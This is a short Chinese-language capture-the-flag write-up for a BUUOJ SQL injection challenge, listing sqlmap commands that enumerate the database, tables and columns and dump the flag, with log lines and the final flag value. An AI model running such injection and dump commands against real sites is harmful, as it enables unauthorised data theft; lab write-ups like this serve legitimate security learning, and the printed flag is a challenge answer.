前置工作
先看题目描述 inject me plz.
我从来没听过这么清晰的要求,进入靶机网页
随便点一个进去,直接从 URL 中找到了注入点 id
http://d2479142-812f-459e-85c0-a713c73f2e26.node4.buuoj.cn:81/?id=TMP0919 |
SqlMap 一条龙
查询数据库的名称
sqlmap -u http://d2479142-812f-459e-85c0-a713c73f2e26.node4.buuoj.cn:81/?id=TMP5512 --current-db |
得到数据库名 ctf
[20:06:27] [INFO] resuming back-end DBMS 'mysql' |
查询表名
如下命令中的两个 ctf
即刚刚查询出来的数据库名
sqlmap -u http://d2479142-812f-459e-85c0-a713c73f2e26.node4.buuoj.cn:81/?id=TMP5512 -D ctf -T ctf --tables |
运行后得到表名 here_is_flag
[20:08:03] [INFO] fetching tables for database: 'ctf' |
查询字段名
如下命令中,ctf
为数据库名,here_is_flag
为表名
sqlmap -u http://d2479142-812f-459e-85c0-a713c73f2e26.node4.buuoj.cn:81/?id=TMP5512 -D ctf -T here_is_flag --columns |
运行后得到字段名 flag
[20:08:38] [INFO] fetching columns for table 'here_is_flag' in database 'ctf' |
力挽狂澜
如下命令中,ctf
为数据库名,here_is_flag
为表名,两个 flag
为字段名
sqlmap -u http://d2479142-812f-459e-85c0-a713c73f2e26.node4.buuoj.cn:81/?id=TMP5512 -D ctf -T here_is_flag -C flag, flag --dump |
最后得到如下内容
[20:12:33] [INFO] fetching entries of column(s) 'flag' for table 'here_is_flag' in database 'ctf' |
Flag 就在脸上了,flag{dc3253bd-170c-4bd3-8f5f-eb1ada6005d0}